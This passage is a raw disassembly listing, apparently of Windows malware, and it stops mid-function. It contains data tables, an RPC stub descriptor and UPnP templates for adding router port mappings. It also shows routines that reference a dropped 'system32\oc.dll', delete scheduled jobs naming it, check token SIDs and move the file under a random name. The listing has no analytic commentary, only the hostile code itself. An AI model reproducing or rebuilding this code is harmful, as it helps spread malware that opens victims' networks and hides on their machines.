dd 5C250812h, 808085Bh, 7 dup(8080808h), 125B5Ch, 3160002h
dd 5C4B0088h, 0C5C46h, 812000Ch, 5C465C25h, 1C001Ch, 5C250812h
dd 785C46h, 8120078h, 5C465C25h, 840084h, 5C250812h, 808085Bh
dd 7 dup(8080808h), 5B080808h, 20012h, 480315h, 4 dup(8080808h)
dd 5B5C0808h, 20012h, 0A80316h, 5C465C4Bh, 480048h, 5C250812h
dd 808085Bh, 9 dup(8080808h), 5B080808h, 20012h, 0E00316h
dd 5C465C4Bh, 480048h, 5C250812h, 808085Bh, 0Dh dup(8080808h)
dd 115B08h, 82B0002h, 40028h, 20001h, 3B0004h, 64h, 65FE2Ah
dd 0FE3C0000h, 66h, 192FE5Ch, 0FE8E0000h, 193h, 1F6FED2h
dd 0FF220000h, 1F7h, 257FF38h, 0FF720000h, 3EDh, 453F526h
dd 0F5EA0000h, 3F2h, 3F8F5E4h, 0F5DE0000h, 3F9h, 3FAF5D8h
dd 0F5D20000h, 5DDh, 5DEF5CCh, 0F5C60000h, 5DFh, 5E2F5C0h
dd 0F5BA0000h, 5E5h, 5E6F5B4h, 0F5AE0000h, 5E7h, 5E8F5A8h
dd 0F5A20000h, 5E9h, 5EAF59Ch, 0F5960000h, 5EBh, 5ECF590h
dd 0F58A0000h, 5EEh, 5F0F584h, 0F57E0000h, 5F1h, 5F2F578h
dd 0F5720000h, 5F3h, 5F4F56Ch, 0F5660000h, 5F5h, 5F8F560h
dd 0F55A0000h, 5F9h, 5FAF554h, 0F54E0000h, 5FDh, 5FEF548h
dd 0F5420000h, 5FFh, 600F53Ch, 0F5360000h, 601h, 602F530h
dd 0F52A0000h, 603h, 604F524h, 0F51E0000h, 605h, 606F518h
dd 0F5120000h, 607h, 608F50Ch, 0F5060000h, 609h, 60AF500h
dd 0F4FA0000h, 60Bh, 60CF4F4h, 0F4EE0000h, 60Dh, 60EF4E8h
dd 0F4E20000h, 610h, 611F4DCh, 0F4D60000h, 612h, 613F4D0h
dd 0F4CA0000h, 614h, 0F4C4h, 2A0011h, 35C29h, 6011Ah, 0
dd 0FFF2004Ch, 1215B5Ch, 180000h, 10000h, 18h, 4C0001h
dd 5B5CFFE0h, 80316h, 5C465C4Bh, 40004h, 0FFDC0012h, 5B08085Bh
dd 21411h, 20012h, 440315h, 4 dup(8080808h), 115B08h, 1B000Eh
dd 180001h, 0Ch, 3165B02h, 5C4B0014h, 45C46h, 8120004h
dd 5C465C25h, 80008h, 0FFDC0012h, 105C46h, 8120010h, 85B5C25h
dd 8080808h, 115B5Ch, 82B021Ah, 0FFFC0008h, 20001h, 40004h
dd 0
dd 10016h, 5A0000h, 2, 300DCh, 1600000h, 120000h, 31B0034h
dd 180014h, 10000h, 49485C4Bh, 14h, 40003h, 8120004h, 85C25h
dd 120008h, 10FF76h, 8120010h, 4C5B5C25h, 5BFF7500h, 80316h
dd 5C465C4Bh, 40004h, 0FFC00012h, 5B08085Bh, 720012h, 180316h
dd 5C465C4Bh, 40004h, 5C250812h, 85C46h, 120008h, 5C46FF36h
dd 100010h, 5C250812h, 145C46h, 8120014h, 85B5C25h, 8080808h
dd 31B5B08h, 180018h, 10000h, 49485C4Bh, 18h, 40004h, 8120004h
dd 85C25h, 120008h, 10FEF6h, 8120010h, 145C25h, 8120014h
dd 4C5B5C25h, 5BFF9300h, 80316h, 5C465C4Bh, 40004h, 0FFB80012h
dd 5B08085Bh, 740012h, 1C0316h, 5C465C4Bh, 40004h, 5C250812h
dd 85C46h, 120008h, 5C46FEAEh, 100010h, 5C250812h, 145C46h
dd 8120014h, 85B5C25h, 8080808h, 5B5C0808h, 1C031Bh, 18h
dd 5C4B0001h, 1C4948h, 40000h, 40004h, 5C250812h, 80008h
dd 0FE6C0012h, 100010h, 5C250812h, 140014h, 5C250812h
dd 91004C5Bh, 3165BFFh, 5C4B0008h, 45C46h, 120004h, 85BFFB8h
dd 125B08h, 1D007Eh, 5B020100h, 1200316h, 5C465C4Bh, 40004h
dd 5C250812h, 85C46h, 120008h, 5C46FE1Eh, 100010h, 5C250812h
dd 145C46h, 8120014h, 85B5C25h, 8080808h, 4C080808h, 5BFFC100h
dd 120031Bh, 18h, 5C4B0001h, 1204948h, 40000h, 40004h
dd 5C250812h, 80008h, 0FDD80012h, 100010h, 5C250812h, 140014h
dd 5C250812h, 8D004C5Bh, 3165BFFh, 5C4B0008h, 45C46h, 120004h
dd 85BFFB8h, 31A5B08h, 8, 4C080000h, 5BFDDD00h, 21411h
dd 20012h, 300315h, 3 dup(8080808h), 115B5Ch, 1B0002h
dd 280001h, 0Ch, 8B75B02h, 0
dd 0FA00h, 5C080811h, 20011h, 2011Bh, 0C0028h, 5B050000h
dd 8B7h, 0FA000000h, 4110000h, 0A0300002h, 4110000h, 0E1300002h
dd 14110000h, 11F646h, 11F652h, 82B0002h, 40028h, 20001h
dd 40120h, 0
dd 1FD2Ah, 0FDCA0000h, 2, 3FE4Ch, 0FED60000h, 110000h
dd 1D0008h, 5B010008h, 100315h, 4C060608h, 5BFFF100h, 3C0011h
dd 140316h, 5C465C4Bh, 100010h, 5C250812h, 0DD004C5Bh
dd 5B5C08FFh, 14031Bh, 18h, 5C4B0001h, 144948h, 10000h
dd 100010h, 5C250812h, 0C9004C5Bh, 3165BFFh, 5C4B0008h
dd 45C46h, 120004h, 85BFFD0h, 115B08h, 11B0002h, 280002h
dd 10010h, 14125B05h, 120002h, 31B0012h, 80008h, 1FFFCh
dd 0F8E8004Ch, 3185B5Ch, 0FFEC0004h, 49485C4Bh, 40008h
dd 80001h, 8120008h, 85B5C25h, 115B5Ch, 82B0002h, 40028h
dd 20001h, 40120h, 0
dd 1FC52h, 0FCF20000h, 2, 3FD74h, 0FDFE0000h, 0
dd 3C0000h, 0A20072h, 12000E4h, 186015Ch, 1F801B6h, 2760240h
dd 2E802A0h, 34E0318h, 3C0038Ah, 42C03FCh, 48C045Ch, 4F204BCh
dd 5700534h, 5DC05A0h, 636060Ch, 6A2066Ch, 72606EAh, 79E075Ch
dd 81607DAh, 876084Ch, 8EE08B2h, 960091Eh, 9D2098Ah, 0A380A02h
dd 0AAA0A68h, 0B100AE0h, 0B8E0B64h, 0
; const MIDL_STUB_DESC pStubDescriptor
pStubDescriptor MIDL_STUB_DESC <offset dword_9A4BA8, offset sub_9A9638, \
; DATA XREF: sub_9AED38+D�o
; sub_9AED5A+D�o
offset loc_9A9646, <offset Binding>, 0, 0, 0, 0, \
offset word_9A57BA, 1, 50002h, 0, 600016Eh, 0, 0, 0, \
1, 0, 0, 0>
byte_9A69C8 db 0 ; DATA XREF: sub_9AEF58+44�r
byte_9A69C9 db 10h ; DATA XREF: sub_9AEF58+4C�r
word_9A69CA dw 1 ; DATA XREF: sub_9AEF58+54�r
dd 4161111h, 8041212h, 41613h, 51717h, 61818h, 131C19h
dd 0B1D1Dh, 0C391Eh, 73E3Ah, 8403Fh, 0E4141h, 0D4545h
dd 104442h, 114646h, 124847h, 144B49h, 154C4Ch, 16524Dh
dd 195C53h, 0A6F5Dh, 1D7170h, 1F7272h
; char SubBlock[]
SubBlock db '\VarFileInfo\Translation',0 ; DATA XREF: sub_9AED7C+95�o
align 10h
stru_9A6A40 _msEH <0FFFFFFFFh, offset loc_9AEE4B, offset loc_9AEE4F>
; DATA XREF: sub_9AED7C+5�o
align 10h
stru_9A6A50 _msEH <0FFFFFFFFh, offset loc_9AEFC8, offset loc_9AEFCC>
; DATA XREF: sub_9AEF58+2�o
dword_9A6A5C dd 8A686FDBh, 236FDB6Bh, 346FF77Ah, 0E3A5E5DCh, 428492B2h
; DATA XREF: sub_9AEFDD+42�o
dd 4199099Bh, 251812ABh, 735h, 0
stru_9A6A80 _msEH <0FFFFFFFFh, offset loc_9AF0AB, offset loc_9AF0AF>
; DATA XREF: sub_9AEFDD+2�o
align 10h
stru_9A6A90 _msEH <0FFFFFFFFh, offset loc_9AF186, offset loc_9AF18A>
; DATA XREF: sub_9AF0BC+5�o
dd 2 dup(0Ch), 2 dup(7), 0Eh, 80h, 4000h, 7Ch, 1000000h
dd 8000h
dword_9A6AC4 dd 1F3F3CDDh, 48F359BFh, 5ABC64A1h, 60516632h ; DATA XREF: sub_9B17CA+ED�o
byte_9A6AD4 db 19h ; DATA XREF: sub_9B17CA+11D�o
; sub_9B213F+FE�r
db 0Eh, 9, 7
dd 4040505h, 3030304h, 2020202h
; char aGetSHttp1_1Hos[]
aGetSHttp1_1Hos db 'GET %s HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_9B3F00+D1�o
db 'Host: %s:%d',0Dh,0Ah
db 'Connection: Close',0Dh,0Ah
db 0Dh,0Ah,0
; char asc_9A6B18[]
asc_9A6B18 db '://',0 ; DATA XREF: sub_9B410C+9�o
aService db 'service',0 ; DATA XREF: sub_9B4526+2A�o
; sub_9B4581+18�o
; char aUrnSchemasUp_2[]
aUrnSchemasUp_2 db 'urn:schemas-upnp-org:service:WANPPPConnection:1',0
; DATA XREF: .text:009A6D2C�o
; sub_9B4581+A4�o
; char aUrnSchemasUp_1[]
aUrnSchemasUp_1 db 'urn:schemas-upnp-org:service:WANIPConnection:1',0
; DATA XREF: .text:009A6D28�o
; sub_9B4581:loc_9B4614�o
align 4
; char aUrnSchemasUpnp[]
aUrnSchemasUpnp db 'urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1',0
; DATA XREF: sub_9B4581+39�o
; sub_9B4B6B+77�o
; char aScpdurl[]
aScpdurl db 'SCPDURL',0 ; DATA XREF: sub_9B468C:loc_9B46F5�o
; char aEventsuburl[]
aEventsuburl db 'eventSubURL',0 ; DATA XREF: sub_9B468C:loc_9B46DC�o
; char aControlurl[]
aControlurl db 'controlURL',0 ; DATA XREF: sub_9B468C:loc_9B46C3�o
align 4
; char aServicetype[]
aServicetype db 'serviceType',0 ; DATA XREF: sub_9B468C:loc_9B46AA�o
; char aUrlbase[]
aUrlbase db 'URLBase',0 ; DATA XREF: sub_9B468C+5�o
; char aPostSHttp1_1Ho[]
aPostSHttp1_1Ho db 'POST %s HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_9B4735+51�o
db 'Host: %s%s',0Dh,0Ah
db 'User-Agent: POSIX, UPnP/1.0',0Dh,0Ah
db 'Content-Length: %d',0Dh,0Ah
db 'Content-Type: text/xml',0Dh,0Ah
db 'SOAPAction: "%s"',0Dh,0Ah
db 'Connection: Close',0Dh,0Ah
db 'Cache-Control: no-cache',0Dh,0Ah
db 'Pragma: no-cache',0Dh,0Ah
db 0Dh,0Ah,0
align 4
; char aHu[]
aHu db ':%hu',0 ; DATA XREF: sub_9B4735+2D�o
align 8
aContentLength db 'content-length',0 ; DATA XREF: sub_9B4826+5�o
align 4
; char aMSearchHttp1_1[]
aMSearchHttp1_1 db 'M-SEARCH * HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_9B4EE4+103�o
db 'HOST: 239.255.255.250:1900',0Dh,0Ah
db 'ST: %s',0Dh,0Ah
db 'MAN: "ssdp:discover"',0Dh,0Ah
db 'MX: 3',0Dh,0Ah
db 0Dh,0Ah,0
align 4
off_9A6D24 dd offset aUrnSchemasUp_0 ; DATA XREF: sub_9B4EE4+E8�o
; "urn:schemas-upnp-org:device:InternetGat"...
dd offset aUrnSchemasUp_1 ; "urn:schemas-upnp-org:service:WANIPConne"...
dd offset aUrnSchemasUp_2 ; "urn:schemas-upnp-org:service:WANPPPConn"...
dd offset aUpnpRootdevice ; "upnp:rootdevice"
align 8
aUpnpRootdevice db 'upnp:rootdevice',0 ; DATA XREF: .text:009A6D30�o
aUrnSchemasUp_0 db 'urn:schemas-upnp-org:device:InternetGatewayDevice:1',0
; DATA XREF: .text:off_9A6D24�o
aSt db 'st',0 ; DATA XREF: sub_9B488E+6C�o
align 10h
aLocation db 'location',0 ; DATA XREF: sub_9B488E+47�o
align 4
; char aConnected[]
aConnected db 'Connected',0 ; DATA XREF: sub_9B4B2C+2B�o
align 4
; char aSBodySEnvelope[]
aSBodySEnvelope db '></s:Body></s:Envelope>',0Dh,0Ah,0 ; DATA XREF: sub_9B4C5A+102�o
align 8
; char a?xmlVersion1_1[]
a?xmlVersion1_1 db '<?xml version="1.0"?>',0Dh,0Ah ; DATA XREF: sub_9B4C5A+5E�o
db '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s'
db ':encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Bod'
db 'y><m:%s xmlns:m="%s">',0
align 4
; char a?xmlVersion1_0[]
a?xmlVersion1_0 db '<?xml version="1.0"?>',0Dh,0Ah ; DATA XREF: sub_9B4C5A+45�o
db '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s'
db ':encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Bod'
db 'y><m:%s xmlns:m="%s"></m:%s></s:Body></s:Envelope>',0Dh,0Ah,0
align 4
; char aSS[]
aSS db '%s#%s',0 ; DATA XREF: sub_9B4C5A+23�o
align 10h
; char cp[]
cp db '239.255.255.250',0 ; DATA XREF: sub_9B4EE4+7F�o
; char aErrorcode[]
aErrorcode db 'errorCode',0 ; DATA XREF: sub_9B5214+105�o
; sub_9B5353+99�o ...
align 4
; char aNewlastconnect[]
aNewlastconnect db 'NewLastConnectionError',0 ; DATA XREF: sub_9B5214+86�o
align 4
; char aNewconnections[]
aNewconnections db 'NewConnectionStatus',0 ; DATA XREF: sub_9B5214+75�o
; char aNewuptime[]
aNewuptime db 'NewUptime',0 ; DATA XREF: sub_9B5214+64�o
align 4
aGetstatusinfo db 'GetStatusInfo',0 ; DATA XREF: sub_9B5214+3C�o
align 4
; char aNewexternalipa[]
aNewexternalipa db 'NewExternalIPAddress',0 ; DATA XREF: sub_9B5353+6D�o
align 4
aGetexternalipa db 'GetExternalIPAddress',0 ; DATA XREF: sub_9B5353+45�o
align 4
; char aNewleasedurati[]
aNewleasedurati db 'NewLeaseDuration',0 ; DATA XREF: sub_9B542A+BB�o
; sub_9B5636+196�o
align 4
aAddportmapping db 'AddPortMapping',0 ; DATA XREF: sub_9B542A+B3�o
align 4
; char aNewportmapping[]
aNewportmapping db 'NewPortMappingDescription',0 ; DATA XREF: sub_9B542A+96�o
; sub_9B5636+16F�o
align 4
; char aNewenabled[]
aNewenabled db 'NewEnabled',0 ; DATA XREF: sub_9B542A+88�o
; sub_9B5636+148�o
align 10h
; char aNewinternalcli[]
aNewinternalcli db 'NewInternalClient',0 ; DATA XREF: sub_9B542A+81�o
; sub_9B5636+FF�o ...
align 4
; char aNewinternalpor[]
aNewinternalpor db 'NewInternalPort',0 ; DATA XREF: sub_9B542A+7A�o
; sub_9B5636+125�o ...
; char aNewprotocol[]
aNewprotocol db 'NewProtocol',0 ; DATA XREF: sub_9B542A+70�o
; sub_9B5561+62�o ...
; char aNewexternalpor[]
aNewexternalpor db 'NewExternalPort',0 ; DATA XREF: sub_9B542A+66�o
; sub_9B5561+56�o ...
; char aNewremotehost[]
aNewremotehost db 'NewRemoteHost',0 ; DATA XREF: sub_9B542A+60�o
; sub_9B5561+4D�o ...
align 10h
aDeleteportmapp db 'DeletePortMapping',0 ; DATA XREF: sub_9B5561+45�o
align 4
aNewportmappi_0 db 'NewPortMappingIndex',0 ; DATA XREF: sub_9B5636+5A�o
aGetgenericport db 'GetGenericPortMappingEntry',0 ; DATA XREF: sub_9B5636+4C�o
align 4
aGetspecificpor db 'GetSpecificPortMappingEntry',0 ; DATA XREF: sub_9B5837+5D�o
dd 89ABCDEFh, 1234567h, 2425CFA0h, 7311C281h
dword_9A70E0 dd 2425CFA0h, 7311C281h, 34AAC8E7h, 64322864h, 0EF68B7C1h
; DATA XREF: sub_9B66FE+B6�o
dd 0B60450E9h, 8D9F06F1h, 0E8FB2390h, 0A691E5BFh, 0DD2E76CBh
dd 2C30BC41h, 0CD0D63Bh, 23058F8Ah, 1F8CCF68h, 88E3775Dh
dd 54E5ED5Bh, 0A6D6031h, 4AD12AAEh, 88222E0Dh, 3E7F16BBh
dd 3FB50C2Ch, 8AF8671Dh, 8BD25C31h, 995AD117h, 4C4B633h
dd 0C878C1DDh, 7A1552ACh, 3B72066Ch, 631EFFCBh, 0D6F3522h
byte_9A7158 db 30h ; DATA XREF: sub_9B6A6A+38�r
; sub_9B6A6A+4B�r
a123456789abcde db '123456789abcdef',0
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_9A7170 proc near ; CODE XREF: StartAddress:loc_9A77C5�p
VersionInformation= _OSVERSIONINFOA ptr -0A0h
var_C = word ptr -0Ch
Data = byte ptr -4
push ebp
lea ebp, [esp-78h]
sub esp, 0A0h
push ebx
push esi
push edi
push 26h
pop ecx
xor eax, eax
mov [ebp+78h+VersionInformation.dwOSVersionInfoSize], 9Ch
lea edi, [ebp+78h+VersionInformation.dwMajorVersion]
rep stosd
lea eax, [ebp+78h+VersionInformation]
push eax ; lpVersionInformation
mov dword ptr [ebp+78h+Data], 0Ah
call GetVersionExA
cmp [ebp+78h+VersionInformation.dwMajorVersion], 5
jnz short loc_9A71FC
cmp [ebp+78h+VersionInformation.dwMinorVersion], 0
jz short loc_9A71B9
cmp [ebp+78h+VersionInformation.dwMinorVersion], 1
jnz short loc_9A71FC
cmp [ebp+78h+var_C], 2
jnb short loc_9A71FC
loc_9A71B9: ; CODE XREF: sub_9A7170+3A�j
lea eax, [ebp+78h+Data]
push eax ; lpData
mov ebx, offset dword_9A1474
push ebx ; lpValueName
mov edi, offset dword_9A1440
push edi ; lpSubKey
mov esi, 80000002h
push esi ; int
call sub_9AC117
add esp, 10h
test eax, eax
jnz short loc_9A71E4
mov dword ptr [ebp+78h+Data], 0FFFFFEh
jmp short loc_9A721A
; ---------------------------------------------------------------------------
loc_9A71E4: ; CODE XREF: sub_9A7170+69�j
mov eax, 0FFFFFEh
cmp dword ptr [ebp+78h+Data], eax
jz short loc_9A721A
push eax ; Data
push ebx ; lpValueName
push edi ; lpSubKey
push esi ; hKey
call sub_9AC0F9
add esp, 10h
jmp short loc_9A721A
; ---------------------------------------------------------------------------
loc_9A71FC: ; CODE XREF: sub_9A7170+34�j
; sub_9A7170+40�j ...
push 1 ; int
push offset Name ; lpName
call sub_9AB5DC
pop ecx
pop ecx
call sub_9A813F
test eax, eax
jz short loc_9A721A
mov dword ptr [ebp+78h+Data], 10000000h
loc_9A721A: ; CODE XREF: sub_9A7170+72�j
; sub_9A7170+7C�j ...
mov eax, dword ptr [ebp+78h+Data]
pop edi
pop esi
mov ds:dword_9B9E20, eax
pop ebx
add ebp, 78h
leave
retn
sub_9A7170 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A722A proc near ; CODE XREF: StartAddress+1A�p
; StartAddress+6C�p ...
Str1 = byte ptr -208h
Str = byte ptr -104h
var_103 = byte ptr -103h
push ebp
mov ebp, esp
sub esp, 208h
push ebx
push esi
push edi
push 40h
xor eax, eax
pop ecx
xor ebx, ebx
mov [ebp+Str], bl
lea edi, [ebp+var_103]
rep stosd
stosw
stosb
lea eax, [ebp+Str]
push eax ; Str
mov esi, offset ExistingFileName ; "c:\\windows\\system32\\oc.dll"
push esi ; Source
call sub_9AC27E
pop ecx
pop ecx
push 104h ; uSize
lea eax, [ebp+Str1]
push eax ; lpBuffer
call GetSystemDirectoryA
push 3 ; MaxCount
lea eax, [ebp+Str]
push eax ; Str
lea eax, [ebp+Str1]
push eax ; Str1
call _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_9A72C0
push esi ; Str
call strlen
cmp eax, 4
pop ecx
jbe short loc_9A72BB
push offset Str2 ; "Ø"
push esi ; Str
call strlen
sub esi, 4
pop ecx
add eax, esi
push eax ; Str1
call _stricmp
test eax, eax
pop ecx
pop ecx
jz short loc_9A72C3
loc_9A72BB: ; CODE XREF: sub_9A722A+71�j
or ebx, 0FFFFFFFFh
jmp short loc_9A72C3
; ---------------------------------------------------------------------------
loc_9A72C0: ; CODE XREF: sub_9A722A+65�j
push 0FFFFFFFEh
pop ebx
loc_9A72C3: ; CODE XREF: sub_9A722A+8F�j
; sub_9A722A+94�j
pop edi
pop esi
mov eax, ebx
pop ebx
leave
retn
sub_9A722A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A72CA proc near ; CODE XREF: sub_9A799E+118�p
pSid1 = dword ptr -28h
var_24 = dword ptr -24h
pIdentifierAuthority= _SID_IDENTIFIER_AUTHORITY ptr -20h
var_18 = dword ptr -18h
hObject = dword ptr -14h
var_10 = dword ptr -10h
ReturnLength = dword ptr -0Ch
pSid2 = dword ptr -8
pSid = dword ptr -4
push ebp
mov ebp, esp
sub esp, 28h
push ebx
lea eax, [ebp+hObject]
push eax ; TokenHandle
xor ebx, ebx
push 8 ; DesiredAccess
mov [ebp+var_18], ebx
call GetCurrentProcess
push eax ; ProcessHandle
call OpenProcessToken
test eax, eax
jz loc_9A740A
push esi
mov esi, GetTokenInformation
lea eax, [ebp+ReturnLength]
push eax ; ReturnLength
push ebx ; TokenInformationLength
push ebx ; TokenInformation
push 2 ; TokenInformationClass
push [ebp+hObject] ; TokenHandle
call esi ; GetTokenInformation
test eax, eax
jnz loc_9A7400
call GetLastError
cmp eax, 7Ah
jnz loc_9A7400
push edi
push [ebp+ReturnLength] ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov edi, eax
cmp edi, ebx
jz loc_9A73FF
lea eax, [ebp+ReturnLength]
push eax ; ReturnLength
push [ebp+ReturnLength] ; TokenInformationLength
push edi ; TokenInformation
push 2 ; TokenInformationClass
push [ebp+hObject] ; TokenHandle
call esi ; GetTokenInformation
test eax, eax
jz loc_9A73F8
mov esi, AllocateAndInitializeSid
lea eax, [ebp+pSid2]
push eax ; pSid
push ebx ; nSubAuthority7
push ebx ; nSubAuthority6
push ebx ; nSubAuthority5
push ebx ; nSubAuthority4
push ebx ; nSubAuthority3
push ebx ; nSubAuthority2
push ebx ; nSubAuthority1
push 4 ; nSubAuthority0
push 1 ; nSubAuthorityCount
lea eax, [ebp+pIdentifierAuthority]
push eax ; pIdentifierAuthority
mov [ebp+pSid2], ebx
mov [ebp+pSid], ebx
mov [ebp+pIdentifierAuthority.Value], bl
mov [ebp+pIdentifierAuthority.Value+1], bl
mov [ebp+pIdentifierAuthority.Value+2], bl
mov [ebp+pIdentifierAuthority.Value+3], bl
mov [ebp+pIdentifierAuthority.Value+4], bl
mov [ebp+pIdentifierAuthority.Value+5], 5
call esi ; AllocateAndInitializeSid
lea eax, [ebp+pSid]
push eax ; pSid
push ebx ; nSubAuthority7
push ebx ; nSubAuthority6
push ebx ; nSubAuthority5
push ebx ; nSubAuthority4
push ebx ; nSubAuthority3
push ebx ; nSubAuthority2
push ebx ; nSubAuthority1
push 6 ; nSubAuthority0
push 1 ; nSubAuthorityCount
lea eax, [ebp+pIdentifierAuthority]
push eax ; pIdentifierAuthority
call esi ; AllocateAndInitializeSid
cmp [edi], ebx
mov [ebp+var_18], 1
mov [ebp+var_10], ebx
jbe short loc_9A73DE
lea esi, [edi+4]
loc_9A73A3: ; CODE XREF: sub_9A72CA+10D�j
mov eax, [esi]
push [ebp+pSid2] ; pSid2
mov ecx, [esi+4]
push eax ; pSid1
mov [ebp+pSid1], eax
mov [ebp+var_24], ecx
call EqualSid
test eax, eax
jnz short loc_9A73DB
push [ebp+pSid] ; pSid2
push [ebp+pSid1] ; pSid1
call EqualSid
test eax, eax
jnz short loc_9A73DE
inc [ebp+var_10]
mov eax, [ebp+var_10]
add esi, 8
cmp eax, [edi]
jb short loc_9A73A3
jmp short loc_9A73DE
; ---------------------------------------------------------------------------
loc_9A73DB: ; CODE XREF: sub_9A72CA+F0�j
mov [ebp+var_18], ebx
loc_9A73DE: ; CODE XREF: sub_9A72CA+D4�j
; sub_9A72CA+100�j ...
cmp [ebp+pSid], ebx
mov esi, FreeSid
jz short loc_9A73EE
push [ebp+pSid] ; pSid
call esi ; FreeSid
loc_9A73EE: ; CODE XREF: sub_9A72CA+11D�j
cmp [ebp+pSid2], ebx
jz short loc_9A73F8
push [ebp+pSid2] ; pSid
call esi ; FreeSid
loc_9A73F8: ; CODE XREF: sub_9A72CA+79�j
; sub_9A72CA+127�j
push edi ; hMem
call GlobalFree
loc_9A73FF: ; CODE XREF: sub_9A72CA+62�j
pop edi
loc_9A7400: ; CODE XREF: sub_9A72CA+3D�j
; sub_9A72CA+4C�j
push [ebp+hObject] ; hObject
call CloseHandle
pop esi
loc_9A740A: ; CODE XREF: sub_9A72CA+21�j
mov eax, [ebp+var_18]
pop ebx
leave
retn
sub_9A72CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7410 proc near ; CODE XREF: sub_9A799E+17B�p
First = byte ptr -114h
TotalEntries = dword ptr -10h
var_C = dword ptr -0Ch
EntriesRead = dword ptr -8
Buffer = dword ptr -4
push ebp
mov ebp, esp
sub esp, 114h
push esi
xor esi, esi
push esi ; ResumeHandle
lea eax, [ebp+TotalEntries]
push eax ; TotalEntries
lea eax, [ebp+EntriesRead]
push eax ; EntriesRead
push 0FFFFFFFFh ; PrefferedMaximumLength
lea eax, [ebp+Buffer]
push eax ; PointerToBuffer
push esi ; Servername
mov [ebp+EntriesRead], esi
mov [ebp+Buffer], esi
call NetScheduleJobEnum
cmp [ebp+EntriesRead], esi
mov [ebp+var_C], esi
jbe loc_9A74D1
push ebx
push edi
xor ebx, ebx
loc_9A7447: ; CODE XREF: sub_9A7410+B9�j
push esi ; lpUsedDefaultChar
push esi ; lpDefaultChar
push 104h ; cbMultiByte
lea eax, [ebp+First]
push eax ; lpMultiByteStr
mov eax, [ebp+Buffer]
push 0FFFFFFFFh ; cchWideChar
push dword ptr [ebx+eax+10h] ; lpWideCharStr
push esi ; dwFlags
push esi ; CodePage
call WideCharToMultiByte
test eax, eax
jz short loc_9A74BD
push 5Ch ; Ch
push offset ExistingFileName ; "c:\\windows\\system32\\oc.dll"
call strrchr
mov edi, eax
cmp edi, esi
pop ecx
pop ecx
jnz short loc_9A7486
mov edi, offset ExistingFileName ; "c:\\windows\\system32\\oc.dll"
jmp short loc_9A7487
; ---------------------------------------------------------------------------
loc_9A7486: ; CODE XREF: sub_9A7410+6D�j
inc edi
loc_9A7487: ; CODE XREF: sub_9A7410+74�j
push offset Srch ; lpSrch
lea eax, [ebp+First]
push eax ; lpFirst
call StrStrIA
test eax, eax
jz short loc_9A74BD
push edi ; lpSrch
lea eax, [ebp+First]
push eax ; lpFirst
call StrStrIA
test eax, eax
jz short loc_9A74BD
mov eax, [ebp+Buffer]
mov eax, [ebx+eax]
push eax ; MaxJobId
push eax ; MinJobId
push esi ; Servername
call NetScheduleJobDel
loc_9A74BD: ; CODE XREF: sub_9A7410+58�j
; sub_9A7410+8B�j ...
inc [ebp+var_C]
mov eax, [ebp+var_C]
add ebx, 14h
cmp eax, [ebp+EntriesRead]
jb loc_9A7447
pop edi
pop ebx
loc_9A74D1: ; CODE XREF: sub_9A7410+2D�j
cmp [ebp+Buffer], esi
pop esi
jz short locret_9A74DF
push [ebp+Buffer] ; Buffer
call NetApiBufferFree
locret_9A74DF: ; CODE XREF: sub_9A7410+C5�j
leave
retn
sub_9A7410 endp
; =============== S U B R O U T I N E =======================================
sub_9A74E1 proc near ; CODE XREF: sub_9A799E+13B�p
push esi
push edi
push offset dword_9A14B0 ; lpSrch
xor edi, edi
call sub_9ABF43
test eax, eax
pop ecx
mov esi, offset ExistingFileName ; "c:\\windows\\system32\\oc.dll"
jz short loc_9A7506
push esi ; lpBuffer
push eax ; dwProcessId
call sub_9ABCA4
test eax, eax
pop ecx
pop ecx
jnz short loc_9A7522
loc_9A7506: ; CODE XREF: sub_9A74E1+16�j
push offset dword_9A14A0 ; Str2
call sub_9ABC24
test eax, eax
pop ecx
jz short loc_9A7525
push esi ; lpBuffer
push eax ; dwProcessId
call sub_9ABCA4
test eax, eax
pop ecx
pop ecx
jz short loc_9A7525
loc_9A7522: ; CODE XREF: sub_9A74E1+23�j
xor edi, edi
inc edi
loc_9A7525: ; CODE XREF: sub_9A74E1+32�j
; sub_9A74E1+3F�j
mov eax, edi
pop edi
pop esi
retn
sub_9A74E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A752A proc near ; CODE XREF: sub_9A7670+6E�p
; sub_9A7670+C7�p ...
NewFileName = byte ptr -120h
var_1D = byte ptr -1Dh
var_1C = byte ptr -1Ch
hMem = dword ptr -0Ch
nNumberOfBytesToWrite= dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 120h
mov eax, ds:dword_9B9F34
push ebx
push esi
xor eax, 45419005h
push edi
push eax ; Seed
call srand
call rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_1C]
add edx, 5
push edx
push eax
call sub_9AB647
call sub_9AB510
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_0]
mov edi, 104h
push offset Format ; "„"
lea eax, [ebp+NewFileName]
push edi ; Count
push eax ; Dest
call _snprintf
lea eax, [ebp+NewFileName]
push 1F01FFh ; int
xor ebx, ebx
push eax ; lpFileName
mov [ebp+var_1D], bl
call sub_9AC163
add esp, 28h
cmp [ebp+arg_4], 0FFFFFFFFh
mov [ebp+var_4], ebx
mov esi, offset ExistingFileName ; "c:\\windows\\system32\\oc.dll"
jnz short loc_9A75C6
lea eax, [ebp+NewFileName]
push eax ; lpNewFileName
push esi ; lpExistingFileName
call MoveFileA
test eax, eax
jz short loc_9A75C6
mov [ebp+var_4], 1
jmp short loc_9A7621
; ---------------------------------------------------------------------------
loc_9A75C6: ; CODE XREF: sub_9A752A+7F�j
